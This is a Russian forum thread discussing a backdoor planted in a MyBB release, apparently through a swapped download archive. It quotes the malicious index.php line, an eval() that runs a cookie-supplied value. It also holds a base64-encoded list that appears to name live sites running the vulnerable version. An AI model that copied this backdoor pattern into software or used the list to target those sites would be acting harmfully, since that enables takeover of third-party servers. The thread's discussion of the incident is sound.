LINUX.ORG.RU
ФорумTalks

[о вечном] Бэкдор в MyBB


0

1

По мотивам OpenNET: http://www.opennet.ru/opennews/art.shtml?num=32128

для Ъ:

Уязвимость системы в файле index.php:

eval(«\$loginform = \»".$templates-get(«index_loginform»).«\»;".@$col[23]);

Кто-то всего лишь добавил туда $col[23] которое берется из куки. В общем за что боролись, на то и напоролись. Нафига там вообще eval... ну да ладно, не суть.

Суть в том, что теперь по всем интернетам этих уязвимых форумов пруд пруди, и неизвестно когда они такие закончатся. Только на первых страницах выдачи яндекса 8 сайтов из 50 - уязвимы. И как-то не очень верится, что хотя бы половина из них когда-нибудь обновятся, уж скорее тупо закроются и отойдут в заботливые лапы киберсквоттеров.

А сколько похожих ляпов осталось на века от других движков, набыдлокоженных на этих ваших пых-пыхах?.. Если задуматься, то вся эта долбаная World Wide Web - одна большая дыра. Порой даже удивляюсь, почему до сих пор никакой червь с толстой базой данных по дыркам не захватил половину Интернета, не вынес к чертям какую-нибудь финансовую биржу затяжным DDoS'ом и не вызвал коллапс мировой экономики?

★★★★★

движков, набыдлокоженных на этих ваших пых-пыхах?

не вынес к чертям какую-нибудь финансовую биржу затяжным DDoS'ом

Для таких штук ынтырпрайзную Java юзают же, а не пэхопэ.

World Wide Web - одна большая дыра.

В обоих смысах этого слова. И одна большая уязвимость, и одна большая дыра (в смысле «в какую же убогую дыру я попал!»)

adriano32 ★★★
()

была внесена злоумышленниками путем подмены архива с релизом форума на сервере загрузки.

три месяца назад выложили, низвестно когда подменили, неизвестно сколько лежала, может дня 3-4? Хотя 8 из 50 первых - скорее через 3-4 дня после релиза подменили :(

spunky ★★
()

> MyBB

но зачем?
на этом вашем пэхапэ есть лишь два более-менее нормальных форумных движка - IP.Board и XenForo

wxw ★★★★★
()

и ещё я просто оставлю это здесь (это с 4х страниц):

aHR0cDovLzRnbmF0aW9ubW9kcy5ob3N0ZWkuY29tLwpodHRwOi8vYmxhdHRlZm9yY2UuY29tLwpo
dHRwOi8vYmxhaGdhbWluZy5uZXQvCmh0dHA6Ly9jaG9pY2ViYi5jb20vCmh0dHA6Ly9lbGl0ZWNh
c2lub2JvbnVzZXMuY29tLwpodHRwOi8vZGIydGVhbS5jb20vCmh0dHA6Ly9lenlhdXRvc2Vydmlj
ZS5jb20vCmh0dHA6Ly9mb3JvLnRlcnJpdG9yaW9hbmRyb2lkLmNvbS8KaHR0cDovL2dvb2RsdWNr
Z2FtaW5nLmluZm8vCmh0dHA6Ly9oYWJmdW4ueDEwLm14LwpodHRwOi8vaGZlbmdpbmVlcmVycy5j
b20vCmh0dHA6Ly9pbmZsYXRpb25nYW1pbmcuY29tLwpodHRwOi8vcHJvamVjdGR1c2sucG9sYXIt
aG9zdC5jb20vCmh0dHA6Ly9yZWFsaXR5ZHluYXN0eS5uZXQvCmh0dHA6Ly9ydW5lc2NhcGUtcnVu
ZXNjYXBlLmNvbS8KaHR0cDovL3J1c3NpYW5sZWFndWUtY2xhbi5ydS8KaHR0cDovL3NvenZlemRp
ZS1rYXBpdGFsLnJ1LwpodHRwOi8vc3BhY2Vtb2JpbGl0eS5vcmcvCmh0dHA6Ly90ZWFtaW5mZWN0
aW9uLmluZm8vCmh0dHA6Ly90bWljbGFzc29mMjAxNC5jb20vCmh0dHA6Ly93aGF0c3lvdXJkb3Vi
dC5jb20vCmh0dHA6Ly93d3cuYmFybnNiYi5jb20vCmh0dHA6Ly93d3cuZGFya3NlcnZpY2UuYml6
LwpodHRwOi8vd3d3LmlxcmFjYWZlLmNvbS8KaHR0cDovL3d3dy50YWxrMm1vbmV5bWFraW5nLmNv
bS8K
ei-grad ★★★★★
() автор топика

Ты ещё удивись, мол, как такой кривой синтаксис как SQL вообще куда-то продвинулся.

Deleted
()
Ответ на: комментарий от ei-grad

Годный тролль, однако ж, оказывается.

Deleted
()
Ответ на: комментарий от ei-grad

>синтаксис SQL лучше чем синтаксис python
Так но-даши прав же.

Ramen ★★★★
()
Ответ на: комментарий от power

Ничего личного, просто посмотрите любой лиспо- или питоносрач :)

power
()
Ответ на: комментарий от wxw

на этом вашем пэхапэ есть лишь два более-менее нормальных форумных движка - IP.Board и XenForo

очередной пропиетарщик в треде

derlafff ★★★★★
()

С opennet:

Пользователям рекомендуется проверить файл index.php на наличие вредоносного кода и удалить директорию «install».

Пользователям рекомендуется проверить сайт на наличие PHP. После обнаружения, сжечь, съесть, улететь в Чили, там нагадить и размазать по Андам.

:)

power
()
Ответ на: комментарий от power

> Синтаксис обсуждают только мудаки.

лисперы настолько закомплексованы, что уже даже обсуждение синтаксиса вызывает у них зуд?

aho
()
Ответ на: комментарий от aho

лисперы настолько закомплексованы, что уже даже обсуждение синтаксиса вызывает у них зуд?

Мне похер, просто критики выглядят очень глупо, когда из аргументов только слезы в отношение отступов или скобочек.

P.S. Пишу на Питоне, Лисп это просто хобби.

power
()
Ответ на: комментарий от wxw

IP - это тот самый invision power board, который ломают даже школяры?

Ghostwolf ★★★★★
()
Ответ на: комментарий от adriano32

>и одна большая дыра (в смысле «в какую же убогую дыру я попал!»)
....
- Сынок, это называется РОДИНА. (с) анекдот про глистов.

vada ★★★★★
()
Ответ на: комментарий от Deleted

>Лисперы такие забавные :}

Правильная Lisp программа отличается от неправильной тем что количество открытых скобок равна количеству закрытых.

vada ★★★★★
()
Ответ на: комментарий от Deleted

Они и не нужны никому, ибо Lisp не нужен, как и все функциональное программирование. :)

vada ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.